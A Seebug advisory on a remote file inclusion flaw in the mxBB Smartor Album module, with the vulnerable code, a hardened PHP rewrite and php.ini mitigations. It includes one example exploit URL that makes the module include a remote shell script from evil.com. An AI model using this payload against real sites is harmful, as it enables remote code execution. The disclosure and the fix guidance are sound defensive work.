mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability

2006-11-06T00:00:00
ID SSV:5483
Type seebug
Reporter Root
Modified 2006-11-06T00:00:00

Description

No description provided by source.

MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}
 
-------------------------------------------------
 
Vulnerable Code:
    if ( $mode == 'album_cat' )
    {
        include($module_root_path . 'includes/album_cat.' . $phpEx);
    }
    (the rest of the vulnerable code removed for brevity)
 
Vulnerability: $module_root_path is uninitialized
 
Source Code: http://www.mx-system.com/index.php?page=4&action=file&file_id=19
 
Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://evil.com/shell.txt?
 
--------------------------------------------------
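
A hardened form of the include shown above, as an added example that is not the module's own code or a vendor patch. The uninitialized `$module_root_path` is attacker-controlled only because `register_globals` copies request parameters into global variables, so the fix sets the path from a trusted value, maps the mode through an allowlist, and checks the resolved file. The helper name `resolve_album_include()`, the `ALLOWED_MODES` table, the file layout, and the assumption that `smartor_mode` feeds `$mode` are illustrative.

```php
<?php
// Added example: hardened version of the advisory's include.
// Assumed (not from the module's source): ALLOWED_MODES,
// resolve_album_include(), and the directory layout.

// Fix 1: initialise the path from a trusted source before any use, so a
// request parameter of the same name can never supply it.
$module_root_path = __DIR__ . '/';
$phpEx = 'php';

// Fix 2: map the requested mode to a fixed set of include files.
const ALLOWED_MODES = ['album_cat' => 'includes/album_cat'];

function resolve_album_include(string $root, string $mode, string $ext): ?string
{
    if (!isset(ALLOWED_MODES[$mode])) {
        return null;                      // unknown mode: nothing to include
    }
    $base = realpath($root);
    $path = realpath($root . ALLOWED_MODES[$mode] . '.' . $ext);
    // Fix 3: the file must exist and resolve to a location under the
    // module root. realpath() returns false for URLs and missing files.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Assumption: the smartor_mode request parameter is what populates $mode.
$mode = isset($_GET['smartor_mode']) ? (string) $_GET['smartor_mode'] : '';
$file = resolve_album_include($module_root_path, $mode, $phpEx);
if ($file === null) {
    http_response_code(404);
    exit;
}
include $file;
```

Independently of the code change, setting `register_globals = Off` and `allow_url_include = Off` in php.ini (on PHP versions that have these directives) removes the two conditions this bug depends on.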